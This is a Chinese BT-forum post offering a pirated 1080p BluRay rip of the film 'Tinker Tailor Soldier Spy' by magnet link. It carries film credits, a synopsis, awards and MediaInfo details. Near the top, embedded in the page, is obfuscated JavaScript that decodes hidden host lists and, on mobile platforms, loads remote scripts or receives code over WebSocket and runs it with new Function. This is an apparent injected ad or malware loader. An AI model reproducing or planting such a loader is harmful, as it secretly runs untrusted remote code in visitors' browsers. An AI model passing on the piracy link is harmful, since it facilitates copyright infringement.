锅匠,裁缝,士兵,间谍[简繁字幕].Tinker.Taylor.Soldier.Spy.2011.BluRay.1080p.DTS-HD.MA5.1.x265.10bit-迅雷下载 16.19GB

版主小s 2月前 334

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 锅匠,裁缝,士兵,间谍 / 谍影情仇 / 谍影行动(台) / 谍网谜踪(港) / 锅匠 / 间谍疑云

◎片 名 Tinker Tailor Soldier Spy

◎年 代 2011

◎产 地 英国 / 法国 / 德国

◎类 别 剧情 / 悬疑 / 惊悚

◎语 言 英语 / 法语 / 俄语 / 匈牙利语 / 土耳其语

◎上映日期 2011-09-16(英国)

◎IMDb评分 7.1/10 from 188923 users

◎IMDb链接 https://www.imdb.com/title/tt1340800

◎豆瓣评分 7.9/10 from 96955 users

◎豆瓣链接 https://movie.douban.com/subject/3338851/

◎片 长 127分钟

◎导 演 托马斯·阿尔弗莱德森 Tomas Alfredson

◎编 剧 约翰·勒·卡雷 John le Carré / 布里奇·奥康纳 Bridget O'Connor / 彼特·斯特劳恩 Peter Straughan

◎主 演 加里·奥德曼 Gary Oldman

科林·费尔斯 Colin Firth

汤姆·哈迪 Tom Hardy

约翰·赫特 John Hurt

托比·琼斯 Toby Jones

马克·斯特朗 Mark Strong

本尼迪克特·康伯巴奇 Benedict Cumberbatch

塞伦·希德 Ciarán Hinds

大卫·丹席克 David Dencik

赛佛兰娜·科契柯娃 Svetlana Khodchenkova

劳拉·卡尔迈克尔 Laura Carmichael

斯蒂芬·格拉汉姆 Stephen Graham

杰瑞德·哈里斯 Jared Harris

约翰·勒·卡雷 John le Carré

康斯坦丁·哈宾斯基 Konstantin Khabensky

西蒙·迈克伯尼 Simon McBurney

罗格·洛伊德-派克 Roger Lloyd-Pack

斯图尔特·格雷厄姆 Stuart Graham

克里斯蒂安·麦凯 Christian McKay

凯西·伯克 Kathy Burke

杰米·托马斯·金 Jamie Thomas King

菲利普·马丁·布朗 Philip Martin Brown

托马什·科瓦尔斯基 Tomasz Kowalski

哈维·沃尔什 Harvey Walsh

◎标 签 英国 | 悬疑 | 间谍 | GaryOldman | 剧情 | ColinFirth | BenedictCumberbatch | 2011

◎简 介

冷战时,全球两大特工组织——俄罗斯“中心”与英国“圆场”明争暗斗。特工遇害,高层震怒,责成“圆场”挖出“地鼠”。怀疑对象共有5人,即圆场上任“老总”命名的锅匠,裁缝,士兵,穷人,乞丐。其中,金盆洗手的“乞丐”乔治·史迈利(加里·奥德曼 Gary Oldman 饰)本来有重大嫌疑。某日,行动组-剥头皮组头目的彼得·吉勒姆(本尼迪克特·康伯巴奇 Benedict Cumberbatch 饰)与英国内阁办公室谍报总监拉康排除了史迈利的嫌疑,令其重新出山,负责挖出“地鼠”。于是,史迈利开始分别走访故人,调查“圆场”老大阿勒莱恩,裁缝-比尔·海顿(科林·费斯 Colin Firth 饰),士兵-掌管东欧事务的资深间谍罗埃·布兰德,穷人-后勤部门点路灯组组长托比·伊斯特哈斯。一时间,圆场疑云密布,人人自危,究竟谁才是“地鼠”……本片本片根据约翰·勒卡雷的同名小说改编。片名来自英国民间的“鹅妈妈童谣集”。

◎获奖情况

第84届奥斯卡金像奖(2012)

最佳男主角(提名) 加里·奥德曼

最佳改编剧本(提名) 布里奇·奥康纳 / 彼特·斯特劳恩

最佳原创配乐(提名) 阿尔维托·伊格莱西亚斯

第68届威尼斯电影节(2011)

金狮奖(提名) 托马斯·阿尔弗莱德森

第25届欧洲电影奖(2012)

观众选择奖(提名) 托马斯·阿尔弗莱德森

最佳男主角(提名) 加里·奥德曼

最佳摄影(提名) 霍伊特·范·霍特玛

最佳配乐 阿尔维托·伊格莱西亚斯

最佳美术设计 玛丽亚·朱科维克

第10届华盛顿影评人协会奖(2011)

最佳改编剧本(提名) 布里奇·奥康纳 / 彼特·斯特劳恩

第24届芝加哥影评人协会奖(2011)

最佳男主角(提名) 加里·奥德曼

最佳改编剧本(提名) 布里奇·奥康纳 / 彼特·斯特劳恩

第11届凤凰城影评人协会奖(2011)

最佳男主角(提名) 加里·奥德曼

第2届豆瓣电影鑫像奖(2012)

鑫豆单元 最佳男演员(外语) 加里·奥德曼

  1. General

  2. Unique ID : 130811032403778400797015565419456931068 (0x626949D6F5835EA9FF3435491FD6A4FC)

  3. Complete name : Tinker.Taylor.Soldier.Spy.2011.BluRay.1080p.DTS-HD.MA5.1.x265.10bit-BeiTai.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 16.2 GiB

  7. Duration : 2 h 7 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 18.2 Mb/s

  10. Encoded date : UTC 2021-07-09 06:48:12

  11. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 2 h 7 min

  20. Bit rate : 14.8 Mb/s

  21. Width : 1 920 pixels

  22. Height : 816 pixels

  23. Display aspect ratio : 2.35:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.395

  30. Stream size : 13.2 GiB (81%)

  31. Title : HEVC, [email protected]@High, 24/1.001 fps @ 14824 kbps

  32. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  33. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / total-frames=183241 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=19.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  34. Language : English

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.709

  39. Transfer characteristics : BT.709

  40. Matrix coefficients : BT.709


  41. Audio

  42. ID : 2

  43. Format : DTS XLL

  44. Format/Info : Digital Theater Systems

  45. Commercial name : DTS-HD Master Audio

  46. Codec ID : A_DTS

  47. Duration : 2 h 7 min

  48. Bit rate mode : Variable

  49. Bit rate : 3 256 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : C L R Ls Rs LFE

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 24 bits

  55. Compression mode : Lossless

  56. Stream size : 2.90 GiB (18%)

  57. Title : English DTS-HD Master Audio 5.1 @ 3256 kbps

  58. Language : English

  59. Default : Yes

  60. Forced : No


  61. Text #1

  62. ID : 3

  63. Format : PGS

  64. Codec ID : S_HDMV/PGS

  65. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  66. Duration : 2 h 0 min

  67. Bit rate : 24.8 kb/s

  68. Count of elements : 2294

  69. Stream size : 21.4 MiB (0%)

  70. Title : Eng/SUP

  71. Language : English

  72. Default : No

  73. Forced : No


  74. Text #2

  75. ID : 4

  76. Format : PGS

  77. Codec ID : S_HDMV/PGS

  78. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  79. Duration : 1 h 58 min

  80. Bit rate : 45.0 kb/s

  81. Count of elements : 4311

  82. Stream size : 38.1 MiB (0%)

  83. Title : Chs/SUP 简体

  84. Language : Chinese

  85. Default : Yes

  86. Forced : No


  87. Text #3

  88. ID : 5

  89. Format : PGS

  90. Codec ID : S_HDMV/PGS

  91. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  92. Duration : 1 h 58 min

  93. Bit rate : 46.4 kb/s

  94. Count of elements : 4311

  95. Stream size : 39.2 MiB (0%)

  96. Title : Cht/SUP 繁体

  97. Language : Chinese

  98. Default : No

  99. Forced : No


  100. Menu

  101. 00:00:00.000 : en:第 01 章

  102. 00:12:39.801 : en:第 02 章

  103. 00:22:44.655 : en:第 03 章

  104. 00:35:04.853 : en:第 04 章

  105. 00:48:35.913 : en:第 05 章

  106. 00:59:11.256 : en:第 06 章

  107. 01:10:34.522 : en:第 07 章

  108. 01:24:45.706 : en:第 08 章

  109. 01:34:48.808 : en:第 09 章

  110. 01:41:51.147 : en:第 10 章

  111. 01:51:18.422 : en:第 11 章

  112. 02:00:19.337 : en:第 12 章


TAGS 剧情 惊悚 悬疑

磁力链:
  • magnet:?xt=urn:btih:4ECEB31D13A1F6FC12DC3F866B066DF4F0BFC0AD
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回